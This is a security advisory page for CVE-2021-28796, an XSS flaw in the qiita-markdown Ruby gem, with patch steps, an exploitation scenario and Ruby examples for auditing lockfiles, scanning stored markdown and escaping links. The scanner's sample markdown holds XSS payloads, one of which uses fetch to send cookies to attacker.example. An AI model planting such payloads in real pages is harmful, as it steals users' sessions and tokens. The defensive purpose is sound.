CVE-2021-28796: Qiita::Markdown: XSS in transformer components
MEDIUM
Qiita::Markdown (the qiita-markdown Ruby gem) before 0.33.0 contains a cross-site scripting vulnerability in its transformer pipeline: markdown supplied by an attacker can inject script into the rendered HTML, which executes in the browser of anyone who views the page. Whether the XSS is stored or reflected depends on how the application sources the markdown. If your AI/ML documentation platforms, knowledge bases, or developer portals render untrusted markdown with this gem, upgrade to 0.33.0 or later. Direct impact is limited to what the victim's browser session can do (session hijacking, theft of tokens exposed to page script), but in shared developer workflows that also means the rendered knowledge content other people rely on can be poisoned.
What is the risk?
Medium risk (CVSS 6.1). Low attack complexity (AC:L) and no privileges required (PR:N) make it easy to weaponize, but it requires user interaction (UI:R): a victim must view the rendered markdown. It is network-accessible (AV:N) and scope-changed (S:C), meaning the impact lands in the victim's browser rather than only in the vulnerable component, with low confidentiality and integrity impact (C:L/I:L) and no availability impact (A:N). In AI/ML team environments where Qiita or similar markdown-rendered platforms hold model documentation, runbooks, or collaborative notebooks, the risk rises slightly because one poisoned page is consumed by many viewers.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| qiita-markdown | RubyGems | < 0.33.0 | 0.33.0 |
If your bundle pins qiita-markdown below 0.33.0, you're affected.
What should I do?
Five steps:
1. Patch: Upgrade the qiita-markdown gem to >= 0.33.0. Check Gemfile.lock for a pinned vulnerable version.
2. Audit: Identify every internal system using the gem, for example with `bundle list | grep qiita-markdown` in each application checkout.
3. Validate: After upgrading, render markdown containing standard XSS payloads (script tags, event-handler attributes, javascript: link targets) and confirm the output is escaped or stripped.
4. Detect: Review web server and application logs, and stored markdown, for script tags or javascript: URIs submitted before the patch.
5. Content hygiene: If Qiita-sourced content feeds RAG pipelines or knowledge bases, or if rendered HTML was cached, re-render historical content from its markdown source with the patched gem rather than trusting output produced before the fix.
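The audit and detect steps above, as an added Ruby example that is not code from the advisory or from the qiita-markdown project. It parses a Gemfile.lock for the pinned qiita-markdown version and compares it against 0.33.0 with `Gem::Version`, then runs a triage scan over stored markdown for the payload shapes named in the detect step (script tags, event-handler attributes, javascript:/data: link targets). The lockfile excerpt, the markdown sample and the regex list are constructed for the demo; the regexes are a heuristic for triage, not a sanitizer.

```ruby
# Added example (not from the advisory or qiita-markdown): audit a Gemfile.lock
# for a vulnerable qiita-markdown pin and triage stored markdown for XSS shapes.
require "rubygems"

# First release that fixes CVE-2021-28796.
PATCHED = Gem::Version.new("0.33.0")

# Returns the qiita-markdown version pinned in a Gemfile.lock "specs:" block,
# or nil if the gem is not in the bundle. Dependency lines such as
# "qiita-markdown (>= 0.1)" do not match because of the operator.
def qiita_markdown_version(lockfile_text)
  m = lockfile_text.match(/^\s+qiita-markdown \(([\w.\-]+)\)\s*$/)
  m && m[1]
end

# True when the pinned version is older than the patched release.
def vulnerable?(lockfile_text)
  v = qiita_markdown_version(lockfile_text)
  return false if v.nil?
  Gem::Version.new(v) < PATCHED
end

# Triage patterns (constructed for this example): script tags, on*= event
# handler attributes, and javascript:/data: targets in links or attributes.
SUSPICIOUS = [
  /<\s*script\b/i,
  /\bon[a-z]+\s*=/i,
  /\]\(\s*javascript:/i,
  /\]\(\s*data:/i,
  /(?:href|src)\s*=\s*["']?\s*javascript:/i,
].freeze

# Returns the 1-based line numbers of a markdown document that match any pattern.
def suspicious_lines(markdown)
  markdown.each_line.with_index(1)
          .select { |line, _| SUSPICIOUS.any? { |re| line.match?(re) } }
          .map(&:last)
end

# Constructed Gemfile.lock excerpt with a vulnerable pin.
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      html-pipeline (2.14.0)
      qiita-markdown (0.32.0)
        html-pipeline (>= 2.14.0)
LOCK

# Constructed markdown as a wiki page might have stored it before the patch.
SAMPLE_MD = <<~MD
  # Model card for demo-classifier
  Trained on [the public set](https://example.com/data).
  [click me](javascript:alert(document.cookie))
  <img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">
  Plain text line.
MD

if $PROGRAM_NAME == __FILE__
  puts "qiita-markdown #{qiita_markdown_version(SAMPLE_LOCK)} vulnerable? #{vulnerable?(SAMPLE_LOCK)}"
  puts "suspicious markdown lines: #{suspicious_lines(SAMPLE_MD).inspect}"
end
```

Run it against a real lockfile with `vulnerable?(File.read("Gemfile.lock"))`; for the markdown scan, feed it each stored document (or request bodies extracted from logs) and review the flagged lines by hand, since a pattern hit is a lead, not proof of exploitation.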
Frequently Asked Questions
What is CVE-2021-28796?
A cross-site scripting flaw in the transformer pipeline of Qiita::Markdown (the qiita-markdown Ruby gem) before 0.33.0: attacker-supplied markdown can inject script into the rendered HTML, which runs in the browser of anyone who views the page. Fixed in 0.33.0.
Is CVE-2021-28796 actively exploited?
No confirmed active exploitation of CVE-2021-28796 has been reported, but organizations should still patch proactively.
How to fix CVE-2021-28796?
Upgrade the qiita-markdown gem to 0.33.0 or later and check Gemfile.lock for a pinned vulnerable version. Then audit which internal systems use the gem, validate the patched rendering against standard XSS payloads, review logs and stored markdown for script tags or javascript: URIs submitted before the patch, and re-render any historical content that feeds RAG pipelines or knowledge bases, as listed under "What should I do?".
What systems are affected by CVE-2021-28796?
Any application that renders untrusted markdown with qiita-markdown below 0.33.0. In AI/ML settings this page calls out the following architecture patterns: developer documentation portals, RAG pipelines (if ingesting Qiita-rendered content), model documentation systems, and collaborative ML notebooks.
What is the CVSS score for CVE-2021-28796?
CVE-2021-28796 has a CVSS v3.1 base score of 6.1 (MEDIUM). The EPSS exploitation probability is 0.77%.
What is the AI security impact?
Affected AI Architectures
- Developer documentation portals
- RAG pipelines (if ingesting Qiita-rendered content)
- Model documentation systems
- Collaborative ML notebooks
MITRE ATLAS Techniques
- AML.T0011.003 Malicious Link
- AML.T0049 Exploit Public-Facing Application
- AML.T0070 RAG Poisoning
- AML.T0078 Drive-by Compromise
What are the technical details?
Original Advisory
Increments Qiita::Markdown before 0.33.0 allows XSS in transformers.
Exploitation Scenario
An adversary targeting an AI/ML team's internal knowledge base creates a Qiita article or wiki page whose markdown carries a payload that the vulnerable transformer passes through into the rendered HTML (for example a script tag, an event-handler attribute, or a javascript: link target). When a developer or data scientist opens the page to review model documentation or training notes, the script executes in their browser session and can read cookies, tokens, or page content that session is allowed to see. In a RAG scenario the same stored content is fetched and re-rendered by AI-assisted developer tooling; if that tooling displays the rendered HTML in a browser or webview, the payload executes there and can exfiltrate credentials or ride sessions used to access ML platforms. Tooling that only extracts text will not execute the script, but it will still ingest the poisoned content.
Weaknesses (CWE)
CWE-79 — Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'): The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
- [Architecture and Design] Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482]. Examples of libraries and frameworks that make it easier to generate properly encoded output include Microsoft's Anti-XSS library, the OWASP ESAPI Encoding module, and Apache Wicket.
- [Implementation, Architecture and Design] Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies. For any data that will be output to another web page, especially any data that was received from external inputs, use the appropriate encoding on all non-alphanumeric characters. Parts of the same output document may require different encodings, which will vary depending on whether the output is in the HTML body, element attributes (such as src="XYZ"), URIs, JavaScript sections, or Cascading Style Sheets. Note that HTML Entity Encoding is only appropriate for the HTML body. Consult the XSS Prevention Cheat Sheet [REF-724] for more details on the types of encoding and escaping that are needed.
Source: MITRE CWE corpus.
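The context-specific encoding point in the CWE-79 mitigations above, as an added Ruby example. This is illustrative code written for this page, not the qiita-markdown project's transformer or its fix for CVE-2021-28796; the function names, the scheme allow-list and the sample inputs are invented. It shows a link-rendering step that allow-lists the URL scheme before the value is placed in an href attribute and applies attribute-context escaping, alongside body-context escaping for the link text. The point it makes is that HTML entity encoding alone does not stop a javascript: target, because the encoded string is still a valid attribute value; a scheme check is a separate control.

```ruby
# Added illustration of CWE-79 context-aware encoding for a markdown link
# transformer. Not code from qiita-markdown; names and inputs are invented.
require "erb"
require "uri"

# Schemes a link target may use. Anything else (javascript:, data:, vbscript:)
# is refused even though it would survive HTML entity encoding untouched.
SAFE_SCHEMES = %w[http https mailto].freeze

# True for relative references and absolute URLs with an allow-listed scheme.
# Strings that do not parse as a URI (tabs, quotes, angle brackets) are rejected,
# which also defeats "java\tscript:" style obfuscation.
def safe_url?(raw)
  uri = URI.parse(raw.strip)
  uri.scheme.nil? || SAFE_SCHEMES.include?(uri.scheme.downcase)
rescue URI::InvalidURIError
  false
end

# Renders one link as HTML. The href value is scheme-checked and then escaped
# for the attribute context (quotes and ampersands matter there); the link text
# gets body-context escaping. An unsafe target degrades to plain text.
def render_link(text, href)
  label = ERB::Util.html_escape(text)
  return label unless safe_url?(href)
  %(<a href="#{ERB::Util.html_escape(href.strip)}">#{label}</a>)
end

if $PROGRAM_NAME == __FILE__
  # Constructed inputs: one benign link, one javascript: payload, one HTML in the label.
  puts render_link("docs", "https://example.com/a?b=1&c=2")
  puts render_link("click me", "javascript:alert(document.cookie)")
  puts render_link("<b>hi</b>", "/local/path")
end
```

The same split applies to image sources and iframe targets: decide what the value is allowed to be for that attribute, then encode it for that attribute, rather than running one HTML-body escape over the whole document and hoping it covers every context.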
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
References
- github.com/increments/qiita-markdown/compare/v0.32.0...v0.33.0 (patch release, third party)
- vuln.ryotak.me/advisories/15 (third party)
Related Vulnerabilities
- CVE-2025-59528 (10.0) Flowise: Unauthenticated RCE via MCP config injection. Same attack type: Code Execution
- CVE-2024-2912 (10.0) BentoML: RCE via insecure deserialization (CVSS 10). Same attack type: Code Execution
- CVE-2023-3765 (10.0) MLflow: path traversal allows arbitrary file read. Same attack type: Data Leakage
- CVE-2025-5120 (10.0) smolagents: sandbox escape enables unauthenticated RCE. Same attack type: Data Leakage
- CVE-2026-21858 (10.0) n8n: Input Validation flaw enables exploitation. Same attack type: Code Execution